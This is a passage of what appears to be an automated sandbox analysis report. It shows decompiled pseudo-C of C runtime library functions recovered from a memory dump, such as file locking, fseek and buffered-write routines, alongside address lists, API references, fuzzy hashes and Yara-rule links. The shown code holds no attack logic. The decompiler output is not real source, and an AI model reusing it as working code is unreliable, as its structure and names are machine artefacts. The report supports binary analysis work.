					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D, Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2561608
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2561608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2561608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02561608), ref: 00414050

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 297a494008008e7eaa5b3e0c45df78ca244f472787f68e3acc1167b455ddb609
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 297a494008008e7eaa5b3e0c45df78ca244f472787f68e3acc1167b455ddb609
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000016.00000002.439507568.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.439543959.0000000000426000.00000040.00020000.sdmp Download File
Associated: 00000016.00000002.439565816.0000000000432000.00000040.00020000.sdmp Download File

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
